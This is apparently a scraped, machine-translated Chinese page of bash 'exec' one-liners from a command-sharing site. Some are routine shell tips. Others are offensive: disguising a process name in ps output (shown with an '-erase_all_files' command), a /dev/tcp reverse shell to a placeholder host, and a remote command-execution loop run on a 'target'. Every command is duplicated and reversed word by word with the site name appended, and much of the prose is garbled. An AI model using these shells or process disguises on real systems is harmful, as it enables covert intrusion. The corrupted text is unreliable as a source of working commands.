隐藏`ps`输出中列出的进程的名称

隐藏进程“your_command”不能用ps显示,显示一些其他正在运行的随机进程名称以获得更好的伪装。
.

0

linux命令:exec -a "$(ps -fea | awk '{print $8}'| sort -R | head -n1)" your_command -sw1 -sw2 -sw2 -sw1 your_command -n1)" head | -R sort $8}'| '{print awk | -fea "$(ps -a exec exec -a "$(ps -fea | awk '{print $8}'| sort -R | head -n1)" your_command -sw1 -sw2rootopen.com
linux命令:exec -a "$(ps -fea | awk '{print $8}'| sort -R | head -n1)" your_command -sw1 -sw2 -sw2 -sw1 your_command -n1)" head | -R sort $8}'| '{print awk | -fea "$(ps -a exec exec -a "$(ps -fea | awk '{print $8}'| sort -R | head -n1)" your_command -sw1 -sw2rootopen.com
qxua 2018-02-12 09:33:48
输出
linux命令:exec 详解
替代方案1 隐藏`ps`输出中列出的进程的名称

exec -a $ NAME $ COMMAND $ ARGS`your_cmd -erase_all_files`是真正的过程,但是看起来无害的getty出现在进程表中。实际上没有必要这样做,但有趣的是......用bash测试,短跑。-a $ NAME“将NAME作为COMMAND的第0个参数传递”,即自定义进程的名称(如`ps`常见的).

linux命令:exec -a "/sbin/getty 38400 tty7" your_cmd -erase_all_files -erase_all_files your_cmd tty7" 38400 "/sbin/getty -a exec exec -a "/sbin/getty 38400 tty7" your_cmd -erase_all_filesrootopen.com
linux命令:exec -a "/sbin/getty 38400 tty7" your_cmd -erase_all_files -erase_all_files your_cmd tty7" 38400 "/sbin/getty -a exec exec -a "/sbin/getty 38400 tty7" your_cmd -erase_all_filesrootopen.com
.
输出

评论

相关推荐

用于在笔记本电脑盖关闭和屏幕关闭的情况下运行长命令

linux命令:exec systemd-inhibit --what = handle-lid-switch --mode = block bash bash block = --mode handle-lid-switch = --what systemd-inhibit exec exec systemd-inhibit --what = handle-lid-switch --mode = block bashrootopen.com
linux命令:exec systemd-inhibit --what = handle-lid-switch --mode = block bash bash block = --mode handle-lid-switch = --what systemd-inhibit exec exec systemd-inhibit --what = handle-lid-switch --mode = block bashrootopen.com
.

bash neto ..

linux命令:exec 3<>/dev/tcp/whatismyip.com/80; echo -e "GET /automation/n09230945.asp HTTP/1.0\r\nHost: whatismyip.com\r\n" >&3; a=( $(cat <&3) ); echo ${a[${#a[*]}-1]}; ${a[${#a[*]}-1]}; echo ); <&3) $(cat a=( >&3; whatismyip.com\r\n" HTTP/1.0\r\nHost: /automation/n09230945.asp "GET -e echo 3<>/dev/tcp/whatismyip.com/80; exec exec 3<>/dev/tcp/whatismyip.com/80; echo -e "GET /automation/n09230945.asp HTTP/1.0\r\nHost: whatismyip.com\r\n" >&3; a=( $(cat <&3) ); echo ${a[${#a[*]}-1]};rootopen.com
linux命令:exec 3<>/dev/tcp/whatismyip.com/80; echo -e "GET /automation/n09230945.asp HTTP/1.0\r\nHost: whatismyip.com\r\n" >&3; a=( $(cat <&3) ); echo ${a[${#a[*]}-1]}; ${a[${#a[*]}-1]}; echo ); <&3) $(cat a=( >&3; whatismyip.com\r\n" HTTP/1.0\r\nHost: /automation/n09230945.asp "GET -e echo 3<>/dev/tcp/whatismyip.com/80; exec exec 3<>/dev/tcp/whatismyip.com/80; echo -e "GET /automation/n09230945.asp HTTP/1.0\r\nHost: whatismyip.com\r\n" >&3; a=( $(cat <&3) ); echo ${a[${#a[*]}-1]};rootopen.com
.

这将使用新的bash会话替换当前的bash会话,以交互式非登录shell的方式运行......如果您更改了/etc/bash.bashrc或〜/ .bashrc,则很有用如果您更改了登录shell的启动脚本, useexec bash -l适用于重新运行/ etc / profile,〜/ .bash_login和〜/ .profile.edit:chinmaya指出thatenv - HOME = $ HOME TERM = $ TERM bash -s“exec bash -l”将清除任何已经设置的shell变量...因为这很难处理,可能需要usealias bash_restart ='env - HOME = $ HOME TERM = $ TERM bash -s“exec bash -l''

linux命令:exec bash bash exec exec bashrootopen.com
linux命令:exec bash bash exec exec bashrootopen.com
.

使用Bash内置插件连接外壳。在Web应用程序渗透测试中很有用,如果是锁定环境,不需要文件上传或可写目录.--必须在编译时在Bash中启用/ dev / tcp和/ dev / udb重定向。大多数Linux发行版默认启用此功能,但至少已知Debian将其禁用.-- http://labs.neohapsis.com/2008/04/17/connect-back-shell-literally/

linux命令:exec 0</dev/tcp/hostname/port; exec 1>&0; exec 2>&0; exec /bin/sh 0</dev/tcp/hostname/port 1>&0 2>&0 2>&0 1>&0 0</dev/tcp/hostname/port /bin/sh exec 2>&0; exec 1>&0; exec 0</dev/tcp/hostname/port; exec exec 0</dev/tcp/hostname/port; exec 1>&0; exec 2>&0; exec /bin/sh 0</dev/tcp/hostname/port 1>&0 2>&0rootopen.com
linux命令:exec 0</dev/tcp/hostname/port; exec 1>&0; exec 2>&0; exec /bin/sh 0</dev/tcp/hostname/port 1>&0 2>&0 2>&0 1>&0 0</dev/tcp/hostname/port /bin/sh exec 2>&0; exec 1>&0; exec 0</dev/tcp/hostname/port; exec exec 0</dev/tcp/hostname/port; exec 1>&0; exec 2>&0; exec /bin/sh 0</dev/tcp/hostname/port 1>&0 2>&0rootopen.com
.

你有一个脚本,其中= ALL = STDERR应该被重定向到STDIN,并且你不想在每个命令的末尾添加“2>&1”... EG:ls -al / foo / bar 2>&1然后只添加这段代码在你的脚本开头!我希望这可以帮助某人。 :)

linux命令:exec 2>&1 2>&1 exec exec 2>&1rootopen.com
linux命令:exec 2>&1 2>&1 exec exec 2>&1rootopen.com
.

只是#7818的替代品

linux命令:exec 3<&0; ls -1N | while read a; do echo "Rename file: $a"; read -e -i "$a" -p "To: " b <&3 ; [ "$a" == "$b" ] || mv -vi "$a" "$b"; done done "$b"; "$a" -vi mv || ] "$b" == "$a" [ ; <&3 b " "To: -p "$a" -i -e read $a"; file: "Rename echo do a; read while | -1N ls 3<&0; exec exec 3<&0; ls -1N | while read a; do echo "Rename file: $a"; read -e -i "$a" -p "To: " b <&3 ; [ "$a" == "$b" ] || mv -vi "$a" "$b"; donerootopen.com
linux命令:exec 3<&0; ls -1N | while read a; do echo "Rename file: $a"; read -e -i "$a" -p "To: " b <&3 ; [ "$a" == "$b" ] || mv -vi "$a" "$b"; done done "$b"; "$a" -vi mv || ] "$b" == "$a" [ ; <&3 b " "To: -p "$a" -i -e read $a"; file: "Rename echo do a; read while | -1N ls 3<&0; exec exec 3<&0; ls -1N | while read a; do echo "Rename file: $a"; read -e -i "$a" -p "To: " b <&3 ; [ "$a" == "$b" ] || mv -vi "$a" "$b"; donerootopen.com
.

这是偷偷摸摸的。首先,在box.nc -l 8080 -vvv上启动监听服务。在目标上,您将创建一个分配给网络节点的新描述符。然后你会读写descriptor.exec 5 <> / dev / tcp / <your_box> / 8080; cat <&5 |而读线;做$ line 2>&5>&5;完成你可以像下面这样将它发送到后台:(exec 5 <> / dev / tcp / <your-box> / 8080; cat <&5 | while read line; do $ line 2>&5>&5;)&在我们的本地监听服务器中将被执行到目标上,并且命令的输出将被传送回客户端。

linux命令:exec 5<>/dev/tcp/<your-box>/8080;cat <&5 | while read line; do $line 2>&5 >&5; done done >&5; 2>&5 $line do line; read while | <&5 5<>/dev/tcp/<your-box>/8080;cat exec exec 5<>/dev/tcp/<your-box>/8080;cat <&5 | while read line; do $line 2>&5 >&5; donerootopen.com
linux命令:exec 5<>/dev/tcp/<your-box>/8080;cat <&5 | while read line; do $line 2>&5 >&5; done done >&5; 2>&5 $line do line; read while | <&5 5<>/dev/tcp/<your-box>/8080;cat exec exec 5<>/dev/tcp/<your-box>/8080;cat <&5 | while read line; do $line 2>&5 >&5; donerootopen.com
.

linux命令:exec 5<>/dev/tcp/time.nist.gov/13; cat <&5 & cat >&5; exec 5>&- 5>&- exec >&5; cat & <&5 cat 5<>/dev/tcp/time.nist.gov/13; exec exec 5<>/dev/tcp/time.nist.gov/13; cat <&5 & cat >&5; exec 5>&-rootopen.com
linux命令:exec 5<>/dev/tcp/time.nist.gov/13; cat <&5 & cat >&5; exec 5>&- 5>&- exec >&5; cat & <&5 cat 5<>/dev/tcp/time.nist.gov/13; exec exec 5<>/dev/tcp/time.nist.gov/13; cat <&5 & cat >&5; exec 5>&-rootopen.com
.

无论STDOUT和STDERR在做什么,这将抓住控制tty。

linux命令:exec 0</dev/tty 0</dev/tty exec exec 0</dev/ttyrootopen.com
linux命令:exec 0</dev/tty 0</dev/tty exec exec 0</dev/ttyrootopen.com
.
共收录0条命令行
这里是记录和分享命令行的地方, 所有命令行都可以进行评论、提交替代方案.

推荐
    热门命令